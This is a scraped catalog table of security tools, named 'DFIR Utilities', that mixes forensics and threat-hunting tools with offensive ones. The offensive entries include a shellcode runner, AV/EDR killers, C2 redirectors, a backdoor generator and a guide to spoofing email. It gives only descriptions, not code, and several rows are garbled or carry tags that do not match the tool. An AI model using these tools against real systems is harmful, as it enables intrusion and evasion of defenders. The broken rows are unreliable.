![DFIR Utilities](data:image/svg+xml,%3Csvg xmlns="http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg" width="2048" height="2048" viewBox="0 0 2048 2048"%3E%3Cpath fill="darkslategray" d="M256 586v876l645 368q-11 32-18 64t-13 66l-742-424V512L1024 0l896 512v384q-28-28-60-50t-68-43V586l-768-439l-768 439zm768 147L768 879v290l225 129q2 42 10 83t23 81l-2 1l-384-220V805l384-220l325 186q-35 14-68 31t-65 40l-192-109zm739 856q65 33 118 81t90 108t57 128t20 142h-128q0-79-30-149t-82-122t-123-83t-149-30q-80 0-149 30t-122 82t-83 123t-30 149h-128q0-73 20-141t57-129t90-108t118-81q-74-54-115-135t-42-174q0-79 30-149t82-122t122-83t150-30q79 0 149 30t122 82t82 123t30 149q0 92-41 173t-115 136zm-483-309q0 53 20 99t55 82t81 55t100 20q53 0 99-20t82-55t55-81t20-100q0-53-20-99t-55-82t-81-55t-100-20q-53 0-99 20t-82 55t-55 81t-20 100z"%2F%3E%3C%2Fsvg%3E)
Tools List
| Name | id | URL | Description | Tags | Github Stars | Github Last Commit |
|---|---|---|---|---|---|---|
1 | URLhaus is a project from abuse.ch with the goal of sharing malicious URLs that are being used for malware distribution. | reputation-engineosint | ||||
3849572548 | This repo provides a list of telemetry features from EDR products and other endpoint agents such as Sysmon broken down by category. | defensive-tradecraftedrgithub-repotradecraft-tool | ||||
3973554086 | MemoryPull is a simple (extremely simple) C# shellcode runner that will call out to external server hosting raw shellcode and run it. The URL is hard coded inside the shellcode runner so you don't have enter anything in a command prompt. | edr-evasionoffensive-tradecraftshellcodeshellcode-donuttradecraft-tool | ||||
3867395334 | Danswer allows you to ask natural language questions against internal documents and get back reliable answers backed by quotes and references from the source material so that you can always trust what you get back. | ai-llmdefensive-tradecrafttradecraft-tool | ||||
3804996147 | Threadless Process Injection using remote function hooking. - GitHub - CCob/ThreadlessInject: Threadless Process Injection using remote function hooking. | edr-evasiongithub-repooffensive-tradecraftthread-injectiontradecraft-tool | ||||
3972863569 | TrueSightKiller is a CPP AV/EDR Killer. This driver can be used in Windows 23H2 with HVCI enabled, loldrivers blocklist, or WDAC enabled. | edr-evasiongithub-repooffensive-tradecrafttactic-loldriverstradecraft-tool | ||||
3332623365 | MemProcFS-Analyzer.ps1 is a PowerShell script utilized to simplify the usage of MemProcFS and to assist with the analysis workflow. Download the latest version of MemProcFS-Analyzer from the Releases section. | defensive-tradecraftdfirgithub-repomemory-forensicstradecraft-tool | ||||
3967322695 | This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. | github-repooffensive-tradecrafttradecraft-tool | ||||
3210164956 | MOSINT is an OSINT Tool for emails. It helps you gather information about the target email. Also, you can exit by pressing the q key. | defensive-tradecraftgithub-repothreat-inteltradecraft-tool | ||||
3967755283 | You gotta worry bout' them malicious processes... TL;DR The Best EDR Of The Market (BEOTM) is an open source EDR designed to serve as a testing ground for understanding and bypassing some of the detection mechanisms employed by many well-known EDRs. | defensive-tradecraftgithub-repooffensive-tradecrafttradecraft-tool | ||||
3679070780 | The purpose of this repository is to set a bridge between Threat Modeling and the security controls definition by providing an equivalence table that maps the STRIDE model against the Application Security Verification Standard (ASVS) chapters. | defensive-tradecraftgithub-repothreat-intelthreat-modellingtradecraft-tool | ||||
3964204184 | By conradculling. | defensive-tradecraftgptmachine-learningthreat-huntingtradecraft-tool | ||||
3963789293 | The "Awesome GPTs (Agents) Repo" represents an initial effort to compile a comprehensive list of GPT agents focused on cybersecurity (offensive and defensive), created by the community. | defensive-tradecraftgithub-repothreat-inteltradecraft-tool | ||||
2985774805 | This tool is designed to predict tactics and techniques from the ATT&CK framework (https://attack.mitre.org/) in cyber threat reports, such as the ones that can be linked in https://otx.alienvault.com/ or https://exchange.xforce.ibmcloud.com/. | automationdefensive-tradecraftdevopsintel-reportthreat-inteltradecraft-tool | ||||
3954029672 | WolfPack combines the capabilities of Terraform and Packer to streamline the deployment of red team redirectors on a large scale. This tool enables security professionals to efficiently scale out the creation and management of Apache redirectors, which mimic authentic websites. | c2github-repooffensive-tradecrafttradecraft-tool | ||||
3955985426 | machine-learningmloffensive-tradecrafttradecraft-tool | |||||
3943932548 | BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. | c2github-repooffensive-tradecrafttradecraft-tool | ||||
3953069219 | FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool. One of the challenging aspects of BloodHound is that it is a snapshot in time. | active-directorybloodhounddefensive-tradecraftgithub-repotradecraft-tool | ||||
3692316176 | JSON Crack is a free, open-source JSON visualization app that will revolutionize the way you work with data. With its intuitive and user-friendly interface, JSON Crack makes it easy to explore, analyze, and understand even the most complex JSON structures. | data-analyticsdata-visualizationdefensive-tradecraftgithub-repotradecraft-tool | ||||
3944101315 | It currently supports searching log files, optionally compressed with gzip (.gz) or zip (.zip), in AWS S3. You can run this from your local laptop, or from an EC2 instance in the same region as the S3 bucket to avoid egress charges. You can authenticate in a number of ways. | aws-cloudazure-cloudcloud-forensicsdefensive-tradecraftdfirgithub-repotradecraft-tool | ||||
3679900805 | Identity lab supporting Azure AD and Active Directory enterprise deployment with SIEM in Azure. Easily build your own Pentest / Red Team / Cyber Range in Azure cloud. PurpleCloud was created as a platform for researching Azure Identity. | azure-clouddefensive-tradecraftdetection-lablab-environmenttradecraft-tool | ||||
3078278733 | Multi-use Hybrid + Identity Cyber Range implementing a small Active Directory Domain in Azure alongside Azure AD and Azure Domain Services. | azure-adazure-clouddefensive-tradecraftgithub-repomicrosoft-entratradecraft-tool | ||||
3942431003 | Moonshine is a C2 framework with a custom Lua interpreter (called Moon, see here for further details) runtime at it's core. The runtime is used in the implants to execute scripts on the remote host, with the option of loading Lua C or script modules to provide additional functionality. | mitre-attckpkm-pocket-pipelinesplunksummarize-article | ||||
3866913880 | This List can be valuable for ThreatHunters, SOC and CERT teams for static analysis on SIEM as it assists in identifying threat actors (or redteamers 😆) using default configurations from renowned exploitation tools in logs. | defensive-tradecraftgithub-repohunt-pipeline-2023threat-huntingthreat-hunting-ideastradecraft-tool | ||||
3924452988 | Abusing mhyprotect (not mhyprot2) to kill AVs / EDRs / XDRs / Protected Processes. | edr-evasiongithub-repooffensive-tradecrafttradecraft-tool | ||||
3932010482 | Run powerpwn --help to get all available commands. | azure-cloudgithub-repooffensive-tradecrafttactic-persistencetradecraft-tool | ||||
3930510823 | SCMUACBypass | cobalt-strikegithub-repokerberosoffensive-tradecrafttradecraft-tool | ||||
3856803752 | Breach Report Collection A collection of companies that disclose adversary TTPs after they have been breached Useful for analysis of intrusions launched by adversaries with measurable effects and impact Organization Breach Date Adversary Source Coinbase February 2023 0ktapus (suspected) coinbase. | defensive-tradecraftgithub-repointel-reportthreat-inteltradecraft-tool | ||||
3745253003 | Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team. | backdoorgithub-repokali-linuxlinuxoffensive-tradecrafttradecraft-tool | ||||
3293389854 | Stand up simple Elastic containers with Kibana, Fleet, and the Detection Engine. Requirements are minimal: *NIX or macOS, Docker, jq, and Git. | defensive-tradecraftdetection-labgithub-repolab-environmentthreat-huntingtradecraft-tool | ||||
3909256490 | DFIR Toolkit Table of contents Installation Overview of timelining tools Tools cleanhive evtx2bodyfile evtxanalyze evtxscan evtxcat evtxls es4forensics hivescan ipgrep lnk2bodyfile mactime2 mft2bodyfile ntdsextract2 pol_export procbins regdump regls regview ts2date usnjrnl_dump Overview of timelini | defensive-tradecraftdfiremail-forensicsgithub-repooffensive-tradecraftosintrecontradecraft-tool | ||||
3129562429 | GHunt (v2) is an offensive Google framework, designed to evolve efficiently. It's currently focused on OSINT, but any use related with Google is possible. It will automatically use venvs to avoid dependency conflicts with other projects. | defensive-tradecraftdfiremail-forensicsgithub-repooffensive-tradecraftosintrecontradecraft-tool | ||||
3659224908 | Your file must be less than 2MB in size. | defensive-tradecraftreverse-engineeringtradecraft-tool | ||||
3914031775 | This tool is for educational purposes only. | c2defensive-tradecraftgithub-reposliver-c2tradecraft-tool | ||||
3874709184 | The tool in question was created in Go and its main objective is to search for API keys in JavaScript files and HTML pages. It works by checking the source code of web pages and script files for strings that are identical or similar to API keys. | api-securitydefensive-tradecraftgithub-repooffensive-tradecrafttradecraft-tool | ||||
2866115939 | Movekit is an extension of built in Cobalt Strike lateral movement by leveraging the execute_assembly function with the SharpMove and SharpRDP .NET assemblies. The aggressor script handles payload creation by reading the template files for a specific execution type. | .netcobalt strikegithub-repooffensive-tradecraftthreat-hunting-ideastradecraft-tool | ||||
3878855094 | This repository consists of tools/links that a expert can use during Pentest/RedTeam. If the tool performs multiple functions, for example collecting subdomains and URLs, it will be listed in two places. Search Engines for Investigation Domains/IP Addresses. | defensive-tradecraftgithub-repooffensive-tradecraftosinttradecraft-tool | ||||
3906134084 | Scenario: you are Local Administrator and there is a logged User you want to Impersonate! Goal: From Local Admin to Domain Admin with Kerberos TGS Required: Local Administrator and a Domain Admin Logged (or Disconnected). In this guide the Domain Admin User is CALIPENDULA\fagiolo | active-directorygithub-repokerberosoffensive-tradecrafttradecraft-tool | ||||
3905594543 | {"payload":{"allShortcutsEnabled":false,"fileTree":{"":{"items":[{"name":"README.md","path":"README.md","contentType":"file"},{"name":"dumper.ps1","path":"dumper.ps1","contentType":"file"},{"name":"injector.ps1","path":"injector. | active-directorygithub-repokerberosoffensive-tradecrafttactic-cred-dumpingtradecraft-tool | ||||
3851019979 | Threat Hunting query in Microsoft 365 Defender, XDR. Provide out-of-the-box KQL hunting queries - App, Email, Identity and Endpoint. - KQL/KQL-Effective-Use at main · LearningKijo/KQL | azure-clouddata-exfiltrationdefensive-tradecraftgithub-repokqltradecraft-tool | ||||
3902553840 | Get info on a websites SSL certs, domain, headers, cookies, DNS records, technologies used, performance, hostnames, crawl rules, server info and more Often when I'm looking into a website, there's several things I always check first. | defensive-tradecraftgithub-repooffensive-tradecrafttradecraft-tool | ||||
3804421977 | This tools detects the artifact of the PowerShell based malware from the eventlog of PowerShell logging. The JSON file can be visualized by viewer.html. | defensive-tradecraftdeobfuscategithub-repopowershelltradecraft-tool | ||||
3902469158 | BadZure is a PowerShell script that leverages the Microsoft Graph SDK to orchestrate the setup of Azure Active Directory tenants, populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths. | defensive-tradecraftgithub-repooffensive-tradecrafttradecraft-tool | ||||
3902110940 | defensive-tradecraftoffensive-tradecrafttradecraft-tool | |||||
1974988845 | LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. | defensive-tradecraftgithub-repotradecraft-tool | ||||
3853903502 | Collection of custom BloodHound queries New Azure stuff MS Graph related | aptattack-pathpkm-pocket-pipelineransomwaresummarize-article | ||||
3899656912 | {"payload":{"allShortcutsEnabled":false,"fileTree":{"adversary_emulation/APT29/Emulation_Plan/Day 2/payloads":{"items":[{"name":"2016_United_States_presidential_election_-_Wikipedia. | github-repooffensive-tradecrafttactic-cred-dumpingtradecraft-tool | ||||
3890838999 | This Streamlit app helps you draft takedown requests to domain registrars. Created by Matt Adams. | ai-llmdefensive-tradecraftgithub-repopythonstreamlittradecraft-tool | ||||
3843283896 | It's a AV/EDR Evasion tool created to bypass security tools for learning, until now the tool is FUD. | bloodhoundcyber-deceptionpkm-pocket-pipelinesummarize-articlethreat-hunting | ||||
3114680822 | The purpose of this list is to track and compare tunneling solutions. This is primarily targeted toward self-hosters and developers who want to do things like exposing a local webserver via a public domain name, with automatic HTTPS, even if behind a NAT or other restricted network. | github-repooffensive-tradecrafttradecraft-tool | ||||
3247509232 | ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). | github-repooffensive-tradecrafttechnique-dll-sideloadtradecraft-tool | ||||
3493575212 | FastFinder - Incident Response - Fast suspicious file finder What is this project designed for? FastFinder is a lightweight tool made for threat hunting, live forensics and triage on Windows Platform. | defensive-tradecraftgithub-repoioc-scannertradecraft-toolwebshell | ||||
3888494661 | ShellSheep and it's suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of encrypted or obfuscated codes often found in webshells. | defensive-tradecraftgithub-repoioc-scannertradecraft-toolwebshell | ||||
3613938953 | ________ _________ _____ _ _____ __ / ___| \/ || ___ \ / ___| (_) / ___| / _| \ `--.| . . || |_/ / \ `--. ___ ___ ___ _ ___ _ __ \ `--. _ __ ___ ___ | |_ ___ _ __ `--. \ |\/| || ___ \ `--. \/ _ \/ __/ __| |/ _ \| '_ \ `--. | cyber-deceptiondefensive-tradecrafttactic-session-enumtradecraft-tool | ||||
3820737835 | This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing exfiltration of data in air gapped systems. | offensive-tradecrafttactic-exfiltrationtechnique-data-encodingtradecraft-tool | ||||
2896377399 | In this instance, the username is 'lightmand' and the domain is 'acmecomputercompany.com'. If a user has logged into OneDrive, this path will exist and return a 403 status code. If they have not, or the user is invalid, it will return a 404. | azure-cloudgithub-repoo365offensive-tradecrafttradecraft-tool | ||||
3881540323 | defensive-tradecraftthreat-inteltradecraft-tool | |||||
3872092889 | AllForOne - Nuclei Template Collector 👤 Welcome to the "AllForOne" repository! 🚀 This repository contains a Python script that allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories, helping to streamline the process of download | defensive-tradecraftgithub-repooffensive-tradecraftpkm-pocket-pipelinetradecraft-tool | ||||
3878056427 | Here you will find privilege escalation tools for Windows and Linux/Unix* and MacOS. These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily. | github-repooffensive-tradecraftpkm-pocket-pipelinetradecraft-tool | ||||
3768625149 | defensive-tradecraftelastic-stackkernelpkm-pocket-pipelineprocedure-syscallsprocess-telemetrysummarize-article | |||||
3857701478 | All Rights Reserved. Semperis Inc. © 2021 IDENTITY RESILIENCE attracts industry experts committed to winning the battle against cybercriminals and the awful acts their illicit activities fund: narcotics, weapons, terrorism, human trafficking, and child exploitation. | defensive-tradecraftelastic-stackkernelpkm-pocket-pipelineprocedure-syscallsprocess-telemetrysummarize-article | ||||
3873454857 | Blackout leveraging gmer driver to effectively disabling or killing EDRs and AVs. the sample is sourced from loldrivers https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/ usage Place the driver Blackout.sys in the same path as the executable Blackout. | defensive-tradecraftelastic-stackkernelpkm-pocket-pipelineprocedure-syscallsprocess-telemetrysummarize-article | ||||
2952669086 | ROADtools is a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool. ROADlib is a library that can be used to authenticate with Azure AD or to build tools that integrate with a database containing ROADrecon data. | azure-addefensive-tradecraftoffensive-tradecrafttradecraft-tool | ||||
3868557298 | ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. | active-directoryoffensive-tradecrafttactic-ad-attacktradecraft-tool | ||||
3401593384 | BeaconEye scans running processes for active CobaltStrike beacons. When processes are found to be running beacon, BeaconEye will monitor each process for C2 activity. | cobalt-strike-c2defensive-tradecrafttradecraft-tool | ||||
3141801589 | Modified version of Matterpreter's DefenderCheck. Takes a binary as input (either from a file on disk or a URL), splits it until it pinpoints that exact bytes that the target engine will flag on and prints them to the screen. | malware-analysisoffensive-tradecrafttactic-amsi-bypasstradecraft-tool | ||||
3861437257 | This is where i will be storing all my malware based projects as i venture into the mystic and unknown. Ill eventually write a detailed explanation of each project in this repo so if there isnt one there when youre looking at it, ill get to it eventually. | github-repooffensive-tradecraftprocedure-syscallstactic-process-injectiontradecraft-tool | ||||
3674562225 | PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery. Why writing such a tool, you might ask. | defensive-tradecraftgithub-repotactic-persistencetradecraft-tool | ||||
3859416704 | driver-controlgithub-repooffensive-tradecrafttradecraft-tool | |||||
3858610914 | About ETWHash is a C# POC that is able to extract NetNTLMv2 hashes of incoming authentications via SMB, by consuming ETW events from the Microsoft-Windows-SMBServer provider {D48CE617-33A2-4BC3-A5C7-11AA4F29619E} Notes Administrative privileges required Usage Usage: EtwHash. | github-repooffensive-tradecrafttool-adversarytradecraft-tool | ||||
27046762 | So, you want to learn how to send your own fake mail? It's extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux - any modern PC that has an internet connection will do it. There are a just a few simple steps. | offensive-tradecraftphishingtradecraft-tool | ||||
3787833242 | C2-Hunter is a program designed for malware analysts to extract Command and Control (C2) traffic from malwares in real-time. The program uses a unique approach by hooking into win32 connections APIs. | defensive-tradecraftgithub-repoioc-scannermemory-forensicstradecraft-tool | ||||
3814000165 | Kraken Version • Requirements • Support • Install • Usage • Examples • Contributing • Bugs English • Spanish Version 1.0.0 - Version changelog Requirements In order to use the tool, the following requirements must first be satisfied: python3.8 (>= 3. | azure-cloudcloud-attackscloud-forensicsemail-compromisemicrosoft-ualsummarize-article | ||||
3762553392 | IATelligence is a Python script that extracts the Import Address Table (IAT) from a PE file and uses OpenAI's GPT-3 model to provide details about each Windows API imported by the file. | defensive-tradecraftgithub-repoiatreverse-engineerthreat-huntingtoolstradecraft-tool | ||||
3279584999 | This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. | defensive-tradecraftgithub-reporeverse-engineeringtradecraft-tool | 0 | 0 | ||
445320361 | Arsenal Image Mounter mounts the contents of disk images as complete disks in Microsoft Windows. | defensive-tradecraftdfirgithub-repoimage-mountertradecraft-tool | 0 | 0 |
